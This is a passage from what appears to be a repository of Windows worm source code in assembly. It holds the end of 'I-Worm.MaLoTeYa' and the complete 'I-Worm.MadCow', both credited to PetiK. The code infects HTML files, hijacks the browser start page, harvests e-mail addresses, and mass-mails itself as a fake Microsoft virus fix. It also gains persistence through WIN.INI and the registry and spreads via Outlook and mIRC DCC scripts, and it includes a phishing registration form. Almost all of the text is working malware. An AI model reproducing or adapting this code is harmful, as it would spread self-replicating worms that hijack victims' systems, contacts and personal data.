jz WIN1
WIN3: mov edi,eax
@pushsz "PetiK always is with you :-)"
push edi
callx SetWindowTextA
jmp WIN1
FIN: push 00h
callx ExitProcess
infect: pushad
mov esi,offset Search.cFileName
push esi
callx GetFileAttributesA
cmp eax,1
je end_infect
push 00h
push 80h
push 03h
push 00h
push 01h
push 40000000h
push esi
callx CreateFileA
xchg eax,edi
inc edi
je end_infect
dec edi
push 02h ; FILE_END
push 00h
push [Dist]
push edi
callx SetFilePointer
push 00h
push offset octets
push HTMSIZE
push offset d_htm
push edi
callx WriteFile
push edi
callx CloseHandle
push 01h ; READONLY
push esi
callx SetFileAttributesA
end_infect: popad
ret
infect2:pushad
push 00h
push 80h
push 03h
push 00h
push 01h
push 80000000h
push offset Search.cFileName
inc eax
je END_SPREAD
dec eax
xchg eax,ebx
xor eax,eax
push eax
push eax
push eax
push 02h ; PAGE_READONLY
push eax
push ebx
callx CreateFileMappingA
test eax,eax
je F1
xchg eax,ebp
xor eax,eax
push eax
push eax
push eax
push 04h ; FILE_MAP_READ
push ebp
callx MapViewOfFile
test eax,eax
je F2
xchg eax,esi
push 00h
push ebx
callx GetFileSize
xchg eax,ecx
jecxz F3
d_scan_mail:
call @melto
db 'mailto:'
@melto: pop edi
scn_mail:
pushad
push 07h
pop ecx
rep cmpsb
popad
je scan_mail
inc esi
loop scn_mail
F3: push esi
callx UnmapViewOfFile
F2: push ebp
callx CloseHandle
F1: push ebx
callx CloseHandle
popad
ret
scan_mail:
xor edx,edx
add esi,7 ; size of the string "mailto:"
mov edi,offset m_addr
push edi
p_car: lodsb ; next character
cmp al,' ' ; space ??
je car_s
cmp al,'"' ; end character ??
je car_f
cmp al,'''' ; end character ??
je car_f
cmp al,'@' ; @ character ??
jne not_a
inc edx
not_a: stosb
jmp p_car ; jmp to nxt char
car_s: inc esi
jmp p_car
car_f: xor al,al
stosb
pop edi
test edx,edx ; exist @ ??
je d_scan_mail
call ENVOIE
jmp d_scan_mail
ENVOIE: xor eax,eax
push eax
push eax
push offset Message
push eax
push [MAPIh]
call [sendmail]
ret
.data
namer db 50 dup (0)
szCopb db 50 dup (0)
szCopie db 50 dup (0)
szCurrent db 50 dup (0)
szOrig db 50 dup (0)
szSystemini db 50 dup (0)
szWinini db 50 dup (0)
Cache db 70 dup (0)
StartUp db 70 dup (0)
m_addr db 128 dup (?)
WSA_Data db 400 dup (0)
buf_recv db 512 dup (0)
Default db 0
FileHdl dd ?
octets dd ?
netcheck dd ?
sendmail dd ?
getfolder dd ?
htmlHdl dd ?
MAPIhdl dd ?
SHELLhdl dd ?
WNEThdl dd ?
RegHdl dd ?
Dist dd 0
Temp dd 0
MAPIh dd 0
WormName db "I-Worm.MaLoTeYa coded by PetiK (c)2001 (05/07)",00h
Origine db "Made In France",00h
Message dd ?
dd offset sujet
dd offset corps
dd ?
dd offset date
dd ?
dd 2 ; MAPI_RECEIPT_REQUESTED ??
dd offset MsgFrom
dd 1 ; MAPI_UNREAD ??
dd offset MsgTo
dd 1
dd offset AttachDesc
MsgFrom dd ?
dd ?
dd offset NameFrom
dd offset MailFrom
dd ?
dd ?
MsgTo dd ?
dd 1 ; MAIL_TO
dd offset NameTo
dd offset m_addr
dd ?
dd ?
AttachDesc dd ?
dd ?
dd ? ; character in text to be replaced by attachment
dd offset szCopb ; Full path name of attachment file
dd ?
dd ?
sujet db "New Virus Alert !!",00h
corps db "This is a fix against I-Worm.Magistr.",0dh,0ah
db "Run the attached file (MSVA.EXE) to detect, repair and "
db "protect you against this malicious worm.",00h
date db "2001/07/01 15:15",00h ; YYYY/MM//DD HH:MM
NameFrom db "Microsoft Virus Alert"
MailFrom db "virus_alert@microsoft.com",00h
NameTo db "Customer",00h
Send_M: dw fHELO-dHELO
dw fFROM-dFROM
dw fRCPT-dRCPT
dw fDATA-dDATA
dw fMAIL-dMAIL
dw fQUIT-dQUIT
dHELO db 'HELO obelisk.mpt.com.uk',0dh,0ah
fHELO:
dFROM db 'MAIL FROM:<maloteya@petik.com>',0dh,0ah
fFROM:
dRCPT db 'RCPT TO:<petik@multimania.com>',0dh,0ah
fRCPT:
dDATA db 'DATA',0dh,0ah
fDATA:
dMAIL: db 'From: "MaLoTeYa",<maloteya@petik.com>',0dh,0ah
db 'Subject: Long Live the Worm',0dh,0ah
db 'Pays d''origine : '
org_pays db 20 dup (0)
db '',0dh,0ah
db '.',0dh,0ah
fMAIL:
dQUIT db 'QUIT',0dh,0ah
fQUIT:
htmd: db "<html><head><title>Virus Alert Registration</title></head>",0dh,0ah
db "<SCRIPT LANGUAGE=""VBScript"">",0dh,0ah
db "Sub control",0dh,0ah
db "dim i",0dh,0ah
db "dim caract",0dh,0ah
db "formu.action=""""",0dh,0ah
db "If formu.mail.value="""" Then",0dh,0ah
db " MsgBox ""Forgotten EMail""",0dh,0ah
db " Else",0dh,0ah
db " For i= 1 to len(formu.mail.value)",0dh,0ah
db " caract=mid(formu.mail.value,i,1)",0dh,0ah
db " If caract=""@"" Then",0dh,0ah
db " Exit For",0dh,0ah
db " End If",0dh,0ah
db " Next",0dh,0ah
db " If caract=""@"" Then",0dh,0ah
db " formu.action=""mailto:petik@multimania.com""",0dh,0ah
db " Else",0dh,0ah
db " MsgBox ""Invalid EMail""",0dh,0ah
db " End If",0dh,0ah
db "End If",0dh,0ah
db "End Sub",0dh,0ah
db "</SCRIPT>",0dh,0ah
db "<body bgcolor=white text=black>",0dh,0ah
db "<p align=""center""><font size=""5"">Microsoft Virus Alert Registration</font></p>",0dh,0ah
db "<p align=""left""><font size=""3"">Please fill out this form. </font>",0dh,0ah
db "<font>You must be connected to internet.</font></p>",0dh,0ah
db "<p></p>",0dh,0ah
db "<form name=""formu"" action method=""POST"" enctype=""text/plan"">",0dh,0ah
db "<p>Name : <input name=""nom"" type=""TEXT"" size=""40""></p>",0dh,0ah
db "<p>Firstname : <input name=""prenom"" type=""TEXT"" size=""40""></p>",0dh,0ah
db "<p>City : <input name=""ville"" type=""TEXT"" size=""40""></p>",0dh,0ah
db "<p>Country : <input name=""pays"" type=""TEXT"" size=""40""></p>",0dh,0ah
db "<p>E-Mail : <input name=""mail"" type=""TEXT"" size=""40""></p>",0dh,0ah
db "<p><input type=""submit"" value=""Submit"" name=""B1"" onclick=""control""></p>",0dh,0ah
db "<p></p>",0dh,0ah
db "<p align=""center""><font><B>AFTER REGISTRATION YOU CAN DELETE THIS FILE</B></font></p>",0dh,0ah
db "</form></body></html>",00h
HTMTAILLE equ $-htmd
d_htm: db "",0dh,0ah,0dh,0ah
db "<SCRIPT Language=VBScript>",0dh,0ah
db "On Error Resume Next",0dh,0ah
db "Set fso=CreateObject(""Scripting.FileSystemObject"")",0dh,0ah
db "Set ws=CreateObject(""WScript.Shell"")",0dh,0ah
db "ws.RegWrite ""HKCU\Software\Microsoft\Internet Explorer\Main\Start Page"",""http://www.petikvx.fr.fm""",0dh,0ah
db "document.Write ""<font face='verdana' color=red size='2'>This file is infected by my new virus"
db "<br>Written by PetiK (c)2001"
db "<br>HTML/W32.MaLoTeYa.Worm<br></font>""",0dh,0ah
db "</SCRIPT>",0dh,0ah
HTMSIZE equ $-d_htm
OSVERSIONINFO struct
dwOSVersionInfoSize dd ?
dwMajorVersion dd ?
dwMinorVersion dd ?
dwBuildNumber dd ?
dwPlatformId dd ?
szCSDVersion db 128 dup (?)
OSVERSIONINFO ends
SYSTIME struct
wYear WORD ?
wMonth WORD ?
wDayOfWeek WORD ?
wDay WORD ?
wHour WORD ?
wMinute WORD ?
wSecond WORD ?
wMillisecond WORD ?
SYSTIME ends
MAX_PATH equ 260
FILETIME struct
dwLowDateTime dd ?
dwHighDateTime dd ?
FILETIME ends
WIN32_FIND_DATA struct
dwFileAttributes dd ?
ftCreationTime FILETIME ?
ftLastAccessTime FILETIME ?
ftLastWriteTime FILETIME ?
nFileSizeHigh dd ?
nFileSizeLow dd ?
dwReserved0 dd ?
dwReserved1 dd ?
cFileName dd MAX_PATH (?)
cAlternateFileName db 13 dup (?)
db 3 dup (?)
WIN32_FIND_DATA ends
OSVer OSVERSIONINFO <>
SystemTime SYSTIME <>
Search WIN32_FIND_DATA <>
end DEBUT
end

353
Win32/I-Worm.MadCow.asm Normal file

@ -0,0 +1,353 @@
comment * ///// I-Worm.MadCow par PetiK ///// 25/11/2000
Pour assembler : tasm32 /M /ML madcow.asm
tlink32 -Tpe -aa -x madcow.obj,,,import32.lib *
jumps
locals
.386
.model flat,stdcall
;KERNEL32.dll
extrn lstrcat:PROC
extrn WritePrivateProfileStringA:PROC
extrn CloseHandle:PROC
extrn CopyFileA:PROC
extrn CreateDirectoryA:PROC
extrn CreateFileA:PROC
extrn DeleteFileA:PROC
extrn ExitProcess:PROC
extrn GetModuleFileNameA:PROC
extrn GetModuleHandleA:PROC
extrn GetSystemDirectoryA:PROC
extrn GetWindowsDirectoryA:PROC
extrn MoveFileA:PROC
extrn WinExec:PROC
extrn WriteFile:PROC
;ADVAPI32.dll
extrn RegSetValueExA:PROC
extrn RegCreateKeyExA:PROC
extrn RegCloseKey:PROC
.data
regDisp dd 0
regResu dd 0
l dd 0
p dd 0
fh dd 0
octets dd ?
szOrig db 260 dup (0)
szOrig2 db 260 dup (0)
szCopie db 260 dup (0)
szCopi2 db 260 dup (0)
szCico db 260 dup (0)
szWin db 260 dup (0)
Dossier db "C:\Win32",00h
fichier db "C:\Win32\Salut.ico",00h
Copico db "\MSLS.ICO",00h
Copie db "\Wininet32.exe",00h
Copie2 db "\MadCow.exe",00h
BATFILE db "C:\Win32\ENVOIE.BAT",00h
VBSFILE db "C:\Win32\ENVOIE.VBS",00h
Winini db "\\WIN.INI",00h
run db "run",00h
windows db "windows",00h
fileini db "C:\Win32\script.ini",00h
Copie3 db "C:\Win32\MadCow.exe",00h
script1 db "C:\mirc\script.ini",00h
script2 db "C:\mirc32\script.ini",00h
script3 db "C:\program files\mirc\script.ini",00h
script4 db "C:\program files\mirc32\script.ini",00h
CLE db "Software\[Atchoum]",00h
CLE2 db "\exefile\DefaultIcon",00h
Signature db "IWorm.MadCow par PetiK (c)2000"
vbsd:
db 'DEBUT()',0dh,0ah
db 'Sub DEBUT()',0dh,0ah
db 'EMAIL()',0dh,0ah
db 'End Sub',0dh,0ah
db '',0dh,0ah
db 'Sub EMAIL()',0dh,0ah
db 'Set K = CreateObject("Outlook.Application")',0dh,0ah
db 'Set L = K.GetNameSpace("MAPI")',0dh,0ah
db 'For Each M In L.AddressLists',0dh,0ah
db 'If M.AddressEntries.Count <> 0 Then',0dh,0ah
db 'Set N = K.CreateItem(0)',0dh,0ah
db 'For O = 1 To M.AddressEntries.Count',0dh,0ah
db 'Set P = M.AddressEntries(O)',0dh,0ah
db 'If O = 1 Then',0dh,0ah
db 'N.BCC = P.Address',0dh,0ah
db 'Else',0dh,0ah
db 'N.BCC = N.BCC & "; " & P.Address',0dh,0ah
db 'End If',0dh,0ah
db 'Next',0dh,0ah
db 'N.Subject = "Pourquoi les vaches sont-elles folles ?"',0dh,0ah
db 'N.Body = "Voila un rapport expliquant la folie des vaches"',0dh,0ah
db 'Set Q = CreateObject("Scripting.FileSystemObject")',0dh,0ah
db 'N.Attachments.Add Q.BuildPath(Q.GetSpecialFolder(0),"MadCow.exe")',0dh,0ah
db 'N.Send',0dh,0ah
db 'End If',0dh,0ah
db 'Next',0dh,0ah
db 'End Sub',0dh,0ah
vbstaille equ $-vbsd
batd:
db '@echo off',0dh,0ah
db 'start C:\Win32\ENVOIE.VBS',0dh,0ah
battaille equ $-batd
inid:
db "[script]",0dh,0ah
db "n0=on 1:JOIN:#:{",0dh,0ah
db "n1= /if ( $nick == $me ) { halt }",0dh,0ah
db "n2= /.dcc send $nick C:\Win32\MadCow.exe",0dh,0ah
db "n3=}",00h
initaille equ $-inid
include icone.inc
.code
DEBUT:
VERIF: mov eax,offset CLE ; Vrifie si il existe une cl
call REG ; [Atchoum] dans HKLM\Software.
cmp [regDisp],1 ; Si elle n'y est pas,
jne INIFILE ; on installe les composants
COPIE: push 0 ;
call GetModuleHandleA ;
push 260 ;
push offset szOrig ;
push eax ;
call GetModuleFileNameA ; Copie le fichier original
push 260 ;
push offset szCopie ;
call GetSystemDirectoryA ; dans le dossier SYSTEM
push offset Copie ;
push offset szCopie ;
call lstrcat ; sous le nom de Wininet32.exe
push 00h ;
push offset szCopie ;
push offset szOrig ;
call CopyFileA ;
push 260 ; puis
push offset szCopi2 ;
call GetWindowsDirectoryA ; … nouveau dans le dossier WINDOWS
push offset Copie2 ;
push offset szCopi2 ;
call lstrcat ; sous le nom de MadCow.exe
push 00h ;
push offset szCopi2 ;
push offset szOrig ;
call CopyFileA ;
WIN_INI:push 260 ; Pour lancer le programme, on peut
push offset szWin ;
call GetWindowsDirectoryA ; utiliser la base de registre ou le
push offset Winini ;
push offset szWin ; fichier WIN.INI dans le dossier
call lstrcat ;
push offset szWin ; WINDOWS. La dmarche est simple :
push offset szCopie ; [windows]
push offset run ; run="nom du programme"
push offset windows ;
call WritePrivateProfileStringA ;
DIR: push 00h ; On cre ici C:\Win32
push offset Dossier ;
call CreateDirectoryA ;
EMAIL :push 00000000h ; On va crer C:\Win32\ENVOIE.VBS
push 00000080h ;
push 00000002h ;
push 00000000h ;
push 00000001h ;
push 40000000h ;
push offset VBSFILE ;
call CreateFileA ;
mov [fh],eax ;
push 00h ;
push offset octets ;
push vbstaille ;
push offset vbsd ;
push [fh] ;
call WriteFile ;
push [fh] ;
call CloseHandle ;
EXEC :push 00000000h ; et C:\Win32\ENVOIE.BAT
push 00000080h ;
push 00000002h ; qui va xcuter ENVOIE.VBS
push 00000000h ;
push 00000001h ;
push 40000000h ;
push offset BATFILE ;
call CreateFileA ;
mov [fh],eax ;
push 00h ;
push offset octets ;
push battaille ;
push offset batd ;
push [fh] ;
call WriteFile ;
push [fh] ;
call CloseHandle ;
jmp EXECBAT ;
REG: push offset regDisp ;
push offset regResu ;
push 0 ;
push 0F003Fh ;
push 0 ;
push 0 ;
push 0 ;
push eax ; Software\[Atchoum]
push 80000002h ; HKEY_LOCAL_MACHINE
call RegCreateKeyExA ;
push [regResu] ; met la valeur dans regResu
call RegCloseKey ;
ret ;
INIFILE:push 00000000h ; On va crer dans C:\Win32
push 00000001h ;
push 00000002h ; le fichier script.ini
push 00000000h ;
push 00000001h ; en lecture seul.
push 40000000h ;
push offset fileini ;
call CreateFileA ;
mov [fh],eax ;
push 00h ;
push offset octets ;
push initaille ;
push offset inid ;
push [fh] ;
call WriteFile ;
push [fh] ;
call CloseHandle ;
push 00h ; On va copier ce fichier dans les
push offset script1 ; rpertoire suivant :
push offset fileini ;
call CopyFileA ; C:\mirc C:\mirc32
test eax,eax ; C:\program files\mirc et dans
jnz COPYWIN ; C:\program files\mirc32
push 00h ;
push offset script2 ; Si il arrive … se copier dans un
push offset fileini ; de ces fichier, il va crer une
call CopyFileA ; copie du programme dans C:\Win32
test eax,eax ; le nom MadCow.exe
jnz COPYWIN ;
push 00h ;
push offset script3 ;
push offset fileini ;
call CopyFileA ;
test eax,eax ;
jnz COPYWIN ;
push 00h ;
push offset script4 ;
push offset fileini ;
call CopyFileA ;
test eax,eax ;
jz ICOFILE ;
COPYWIN:push 0 ;
call GetModuleHandleA ;
push 260 ;
push offset szOrig2 ;
push eax ;
call GetModuleFileNameA ; Copie le fichier original
push 00h ;
push offset Copie3 ;
push offset szOrig2 ;
call CopyFileA ;
jmp FIN ;
ICOFILE:push 00000000h ; On va crer … la base du disque
push 00000080h ;
push 00000002h ; dur le fichier Salut.ico
push 00000000h ;
push 00000001h ;
push 40000000h ;
push offset fichier ;
call CreateFileA ;
mov [fh],eax ;
push 00h ;
push offset octets ;
push icotaille ;
push offset icod ;
push [fh] ;
call WriteFile ;
push [fh] ;
call CloseHandle ;
push 260 ; On dplace le fichier Salut.ico
push offset szCico ;
call GetSystemDirectoryA ; dans le dossier SYSTEM sous
push offset Copico ;
push offset szCico ; MSLS.ICO
call lstrcat ;
push offset szCico ;
push offset fichier ;
call MoveFileA ; => c'est fait
REG2: push offset l ;
push offset p ;
push 0 ;
push 1F0000h + 1 + 2h ;
push 0 ;
push 0 ;
push 0 ;
push offset CLE2 ; Run
push 80000000h ; HKEY_CLASSES_ROOT
call RegCreateKeyExA ;
push 05h ;
push offset szCico ; %system%\MSLS.ico
push 01h ;
push 0 ;
push 00h ; VALEUR PAR DEFAUT
push p ;
call RegSetValueExA ; CREE UN REGISTRE
push 0 ;
call RegCloseKey ; FERME LA BASE DE REGISTRE
jmp FIN ; PUIS TERMINE LE PROGRAMME
EXECBAT:push 01h ; On xcute le fichier ENVOIE.BAT
push offset BATFILE ;
call WinExec ;
FIN: push 00h ; FIN DU PROGRAMME
call ExitProcess ;
end DEBUT
*************************************************************************
comment *
ICONE.INC pour I-Worm.MadCow
CE FICHIER EST LA FORME HEXADECIMAL DE L'ICONE QUE L'ON VEUT CREER
*
icod:
db 000h,000h,001h,000h,001h,000h,010h,010h,010h,000h,000h,000h,000h,000h
db 028h,001h,000h,000h,016h,000h,000h,000h,028h,000h,000h,000h,010h,000h
db 000h,000h,020h,000h,000h,000h,001h,000h,004h,000h,000h,000h,000h,000h
db 0C0h,000h,000h,000h,000h,000h,000h,000h,000h,000h,000h,000h,010h,000h
db 000h,000h,000h,000h,000h,000h,000h,000h,000h,000h,000h,000h,080h,000h
db 000h,080h,000h,000h,000h,080h,080h,000h,080h,000h,000h,000h,080h,000h
db 080h,000h,080h,080h,000h,000h,0C0h,0C0h,0C0h,000h,080h,080h,080h,000h
db 000h,000h,0FFh,000h,000h,0FFh,000h,000h,000h,0FFh,0FFh,000h,0FFh,000h
db 000h,000h,0FFh,000h,0FFh,000h,0FFh,0FFh,000h,000h,0FFh,0FFh,0FFh,000h
db 0FFh,0FFh,0FFh,0FFh,0FFh,0FFh,0FFh,0FFh,0F0h,000h,000h,000h,000h,000h
db 000h,00Fh,0F0h,000h,000h,000h,000h,000h,000h,00Fh,0F0h,000h,000h,00Fh
db 0FFh,000h,000h,00Fh,0F0h,000h,000h,0F0h,000h,0F0h,000h,00Fh,0F0h,000h
db 000h,0F0h,000h,0F0h,000h,00Fh,0F0h,000h,00Fh,000h,000h,00Fh,000h,00Fh
db 0F0h,000h,00Fh,000h,00Fh,00Fh,000h,00Fh,0F0h,000h,0F0h,0FFh,000h,0F0h
db 0F0h,00Fh,0F0h,000h,0F0h,000h,000h,000h,0F0h,00Fh,0F0h,000h,00Fh,000h
db 000h,00Fh,000h,00Fh,0F0h,000h,00Fh,0FFh,0FFh,0FFh,000h,00Fh,0F0h,000h
db 0F0h,000h,000h,000h,0F0h,00Fh,0F0h,000h,00Fh,000h,000h,00Fh,000h,00Fh
db 0F0h,000h,000h,000h,000h,000h,000h,00Fh,0FFh,0FFh,0FFh,0FFh,0FFh,0FFh
db 0FFh,0FFh,000h,000h,0FFh,0FFh,07Fh,0FEh,0FFh,0FFh,07Fh,0FEh,0FFh,0FFh
db 07Eh,03Eh,0FFh,0FFh,07Dh,0DEh,0FFh,0FFh,07Dh,0DEh,0FFh,0FFh,07Bh,0EEh
db 0FFh,0FFh,07Bh,0AEh,0FFh,0FFh,074h,0D6h,0FFh,0FFh,077h,0F6h,0FFh,0FFh
db 07Bh,0EEh,0FFh,0FFh,078h,00Eh,0FFh,0FFh,077h,0F6h,0FFh,0FFh,07Bh,0EEh
db 0FFh,0FFh,07Fh,0FEh,0FFh,0FFh,000h,000h,0FFh,0FFh
icotaille equ $-icod

4982
Win32/I-worm.Icecubes.asm Normal file

File diff suppressed because it is too large Load Diff